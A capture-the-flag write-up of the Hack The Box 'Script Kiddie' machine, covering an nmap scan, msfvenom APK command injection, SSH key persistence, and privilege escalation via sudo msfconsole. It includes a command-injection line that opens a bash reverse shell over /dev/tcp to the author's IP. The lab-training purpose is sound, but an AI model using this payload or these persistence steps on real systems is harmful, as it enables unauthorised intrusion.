Script Kiddie ~ Hack The Box

CTFs Feb 11, 2021


Prerequisite

Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

echo "10.129.76.86	scriptkiddie.htb" >> /etc/hosts

Okay now onto the hacking!


Reconnaissance

As always, I started off with an NMAP scan against the machine.

 nmap -Pn -sC -sV -A -p- -oN initial scriptkiddie.htb
┌──(root💀kali)-[/home/…/boxes/htb/machines/scriptkiddie]
└─#  nmap -Pn -sC -sV -A -p- -oN initial scriptkiddie.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-10 09:26 EST
Nmap scan report for scriptkiddie.htb (10.129.76.86)
Host is up (0.24s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5

Scanning & Enumeration

Based on the scan that was run, I realized that port 5000 was running a web server. Thus, I went to investigate and this was what I ended up with!

Its some kind of toolkit running on a Linux based box giving the user access to h4ck3r t00l5. My next action was to look at how I can abuse this to gain a reverse shell on the remote machine.

After trying out various methods such as uploading reverse shells and intercepting requests to try and find something interesting, I landed on this.

MSF Venom had a vulnerability where you could perform command injection while providing a APK template to generate payload. This site did allow me to generate my own payload using MSF Venom.

Exploitation

Upon finding this exploit, I fired up MSF console to generate an APK template to upload and gain reverse shell on the target box. [Link to MSF Module]

Followed by that I went ahead and uploaded the APK "Template file" onto the site's payload section and opened up a Netcat listener on my end to catch any incoming shells.

Once I hit the generate button, my listener successfully caught a reverse shell from the remote machine which I then proceeded to stabilize with the following python mini-script...

python3 -c 'import pty; pty.spawn("/bin/bash")'

Maintaining Access

Since I discovered that SSH was running on the server, I generated a new pair of SSH keys and placed the public key on the remote machine!

This allowed me to then SSH into the machine as the kid user without any password authentication.

Interactive Shell + User Flag~!

Privilege Escalation [Level 1]

Looking around the FS, I realized that there was another user named pwn and in the user's home directory lived a shell script.

This shell script seemed to read IPs from a file located at kid's (the user I currently own) home directory and run a NMAP scan against it. This script was also owned by the pwn user.

My theory was to somehow invoke an entry into the file which would help escape the NMAP command and run bash to gain a reverse shell to the pwn user account!

[email protected]:~/logs$ echo "NEEPOC  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.153/9876 0>&1' #" >> hackers

And I was able to gain a shell! I then proceeded to do the same thing with the SSH keys and stabilize my shell.


Privilege Escalation [Level 2]

Lastly, the path to gain root access to the machine was pretty straight forward. I first ran sudo -l to figure out what binaries I was able to run as root.

This revealed that I was able to run MSF Console with root privileges without any password. Thus, I abused this and invoked /bin/bash after running MSF Console with root privileges.

And that's it, I was able to root this box!

Tags